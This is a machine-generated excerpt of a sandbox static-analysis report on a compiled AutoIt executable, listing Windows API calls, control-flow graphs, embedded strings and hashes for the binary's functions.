          • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6

          Control-flow Graph

          APIs
          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
            • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
            • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
          • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
          • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
            • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
          • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
          • MessageBoxA.USER32 ref: 0042E1C9
          • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
          • GetForegroundWindow.USER32 ref: 0042E2B2
          • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
            • Part of subcall function 00410390: GetSysColorBrush.USER32 ref: 0041039B
            • Part of subcall function 00410390: LoadCursorW.USER32 ref: 004103AA
            • Part of subcall function 00410390: LoadIconW.USER32 ref: 004103C0
            • Part of subcall function 00410390: LoadIconW.USER32 ref: 004103D3
            • Part of subcall function 00410390: LoadIconW.USER32 ref: 004103E6
            • Part of subcall function 00410390: LoadImageW.USER32 ref: 0041040E
            • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
            • Part of subcall function 00410570: CreateWindowExW.USER32 ref: 004105A5
            • Part of subcall function 00410570: CreateWindowExW.USER32 ref: 004105CE
            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
            • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
          Strings
          • runas, xrefs: 0042E2AD, 0042E2DC
          • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
          • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
          • API String ID: 2495805114-3383388033
          • Opcode ID: 14fbfed9d7ce49064919d8a8ffda34cda3be3de4aef35c0aaa40de56ee040f94
          • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
          • Opcode Fuzzy Hash: 14fbfed9d7ce49064919d8a8ffda34cda3be3de4aef35c0aaa40de56ee040f94
          • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 922 44bf8b-44bfb9 call 410120 call 433998 927 44bfcd-44c011 call 413a0e FindFirstFileW 922->927 928 44bfbb-44bfca call 411536 922->928 933 44c092-44c0a2 FindClose 927->933 934 44c013-44c016 927->934 928->927 934->933 935 44c018-44c020 934->935 936 44c022-44c06a call 411567 call 411536 * 2 DeleteFileW 935->936 937 44c06c-44c07d FindNextFileW 935->937 936->937 945 44c083-44c091 FindClose 936->945 937->934 938 44c07f-44c081 937->938 938->934
          APIs
            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
          • _wcscat.LIBCMT ref: 0044BFC5
          • __wsplitpath.LIBCMT ref: 0044BFEF
          • FindFirstFileW.KERNEL32(?,?), ref: 0044C004
          • _wcscpy.LIBCMT ref: 0044C030
          • _wcscat.LIBCMT ref: 0044C042
          • _wcscat.LIBCMT ref: 0044C054
          • DeleteFileW.KERNEL32(?), ref: 0044C061
          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044C075
          • FindClose.KERNEL32(00000000), ref: 0044C084
          • FindClose.KERNEL32(00000000), ref: 0044C093
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: FileFind$_wcscat$Close$AttributesDeleteFirstFullNameNextPath__wsplitpath_wcscpy
          • String ID: \*.*
          • API String ID: 3771809977-1173974218
          • Opcode ID: 830d218729085bc277516c730bc492c18a9c637125668c2fa1f4e264b6b5cf94
          • Instruction ID: a80060c485f0c376bb4167ae0b00d0fca8fe69e194215be70a311f08e499f8fe
          • Opcode Fuzzy Hash: 830d218729085bc277516c730bc492c18a9c637125668c2fa1f4e264b6b5cf94
          • Instruction Fuzzy Hash: 3B31C472409300AAC720DFA0DC84ADFB7DCAF99314F444E1EFA8982151EB38D24887A7

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1335 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1344 40e582-40e583 1335->1344 1345 427674-427679 1335->1345 1348 40e585-40e596 1344->1348 1349 40e5ba-40e5cb call 40ef60 1344->1349 1346 427683-427686 1345->1346 1347 42767b-427681 1345->1347 1351 427693-427696 1346->1351 1352 427688-427691 1346->1352 1350 4276b4-4276be 1347->1350 1353 427625-427629 1348->1353 1354 40e59c-40e59f 1348->1354 1367 40e5ec-40e60c 1349->1367 1368 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1349->1368 1369 4276c6-4276ca GetSystemInfo 1350->1369 1351->1350 1358 427698-4276a8 1351->1358 1352->1350 1360 427636-427640 1353->1360 1361 42762b-427631 1353->1361 1356 40e5a5-40e5ae 1354->1356 1357 427654-427657 1354->1357 1363 40e5b4 1356->1363 1364 427645-42764f 1356->1364 1357->1349 1362 42765d-42766f 1357->1362 1365 4276b0 1358->1365 1366 4276aa-4276ae 1358->1366 1360->1349 1361->1349 1362->1349 1363->1349 1364->1349 1365->1350 1366->1350 1370 40e612-40e623 call 40efd0 1367->1370 1371 4276d5-4276df GetSystemInfo 1367->1371 1368->1367 1378 40e5e8 1368->1378 1369->1371 1370->1369 1376 40e629-40e63f call 40ef90 GetNativeSystemInfo 1370->1376 1381 40e641-40e642 FreeLibrary 1376->1381 1382 40e644-40e651 1376->1382 1378->1367 1381->1382 1383 40e653-40e654 FreeLibrary 1382->1383 1384 40e656-40e65d 1382->1384 1383->1384
          APIs
          • GetVersionExW.KERNEL32(?), ref: 0040E52A
            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
          • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
          • GetNativeSystemInfo.KERNEL32(?), ref: 0040E632
          • FreeLibrary.KERNEL32(?), ref: 0040E642
          • FreeLibrary.KERNEL32(?), ref: 0040E654
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
          • String ID: 0SH
          • API String ID: 3363477735-851180471
          • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
          • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
          • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
          • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
          APIs
          • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
          • __wsplitpath.LIBCMT ref: 00475644
            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
          • _wcscat.LIBCMT ref: 00475657
          • __wcsicoll.LIBCMT ref: 0047567B
          • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
          • CloseHandle.KERNEL32(00000000), ref: 004756BA
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
          • String ID:
          • API String ID: 2547909840-0
          • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
          • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
          • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
          • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
          APIs
            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
          • CoInitialize.OLE32(00000000), ref: 0046E505
          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
          • CoUninitialize.OLE32 ref: 0046E53D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: CreateInitializeInstanceUninitialize_wcslen
          • String ID: .lnk
          • API String ID: 886957087-24824748
          • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
          • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
          • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
          • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
          APIs
          • LoadLibraryA.KERNEL32(uxtheme.dll), ref: 0040EBDB
          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: AddressLibraryLoadProc
          • String ID: IsThemeActive$uxtheme.dll
          • API String ID: 2574300362-3542929980
          • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
          • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
          • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
          • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
          APIs
          • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
          • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
          • FindClose.KERNEL32(00000000), ref: 004339EB
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: FileFind$AttributesCloseFirst
          • String ID:
          • API String ID: 48322524-0
          • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
          • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
          • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
          • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
          APIs
          • SetUnhandledExceptionFilter.KERNEL32 ref: 0041F255
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: ExceptionFilterUnhandled
          • String ID:
          • API String ID: 3192549508-0
          • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
          • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
          • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
          • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
          APIs
          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
          • Sleep.KERNEL32(0000000A,?), ref: 004094D1
          • TranslateMessage.USER32(?), ref: 00409556
          • DispatchMessageW.USER32(?), ref: 00409561
          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: Message$Peek$DispatchSleepTranslate
          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
          • API String ID: 1762048999-758534266
          • Opcode ID: b2e355a9e68978becebbbb8a50c14b249449a02c480c695bf073c373e6d8d740
          • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
          • Opcode Fuzzy Hash: b2e355a9e68978becebbbb8a50c14b249449a02c480c695bf073c373e6d8d740
          • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

          Control-flow Graph

          APIs
            • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
          • _fseek.LIBCMT ref: 00452B3B
          • __wsplitpath.LIBCMT ref: 00452B9B
          • _wcscpy.LIBCMT ref: 00452BB0
          • _wcscat.LIBCMT ref: 00452BC5
          • __wsplitpath.LIBCMT ref: 00452BEF
          • _wcscat.LIBCMT ref: 00452C07
          • _wcscat.LIBCMT ref: 00452C1C
          • __fread_nolock.LIBCMT ref: 00452C53
          • __fread_nolock.LIBCMT ref: 00452C64
          • __fread_nolock.LIBCMT ref: 00452C83
          • __fread_nolock.LIBCMT ref: 00452C94
          • __fread_nolock.LIBCMT ref: 00452CB5
          • __fread_nolock.LIBCMT ref: 00452CC6
          • __fread_nolock.LIBCMT ref: 00452CD7
          • __fread_nolock.LIBCMT ref: 00452CE8
            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
          • __fread_nolock.LIBCMT ref: 00452D78
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
          • String ID:
          • API String ID: 2054058615-0
          • Opcode ID: 50042e0156cded86378d5b012099982cf84fa17c465c29aba3a9bb9f7a36ac26
          • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
          • Opcode Fuzzy Hash: 50042e0156cded86378d5b012099982cf84fa17c465c29aba3a9bb9f7a36ac26
          • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66

          Control-flow Graph

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID:
          • String ID: >>>AUTOIT SCRIPT<<<$\
          • API String ID: 0-1896584978
          • Opcode ID: 7e2b0c612175c553a1e2c79d2ca40bf9c2b0d709b7dc904607aac1272b755b71
          • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
          • Opcode Fuzzy Hash: 7e2b0c612175c553a1e2c79d2ca40bf9c2b0d709b7dc904607aac1272b755b71
          • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99

          Control-flow Graph

          APIs
          • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
          • __wcsicoll.LIBCMT ref: 00402007
          • __wcsicoll.LIBCMT ref: 0040201D
          • __wcsicoll.LIBCMT ref: 00402033
            • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
          • __wcsicoll.LIBCMT ref: 00402049
          • _wcscpy.LIBCMT ref: 0040207C
          • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872018075.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872027874.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872034410.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872047189.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_UNK_.jbxd
          Similarity
          • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
          • API String ID: 3948761352-1609664196
          • Opcode ID: fb742eb3e3b9472f662d9eb0d9266b7c596f0002b12228fde03e2c1a898d0588
          • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
          • Opcode Fuzzy Hash: fb742eb3e3b9472f662d9eb0d9266b7c596f0002b12228fde03e2c1a898d0588
          • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

          Control-flow Graph

          APIs
            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
          • __wsplitpath.LIBCMT ref: 0040E41C
            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
          • _wcsncat.LIBCMT ref: 0040E433
          • __wmakepath.LIBCMT ref: 0040E44F
            • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
          • _wcscpy.LIBCMT ref: 0040E487
            • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNEL32 ref: 0040E4DD
          • _wcscat.LIBCMT ref: 00427541
          • _wcslen.LIBCMT ref: 00427551
          • _wcslen.LIBCMT ref: 00427562
          • _wcscat.LIBCMT ref: 0042757C
          • _wcsncpy.LIBCMT ref: 004275BC
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.871988413.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.871977044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.872012710.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
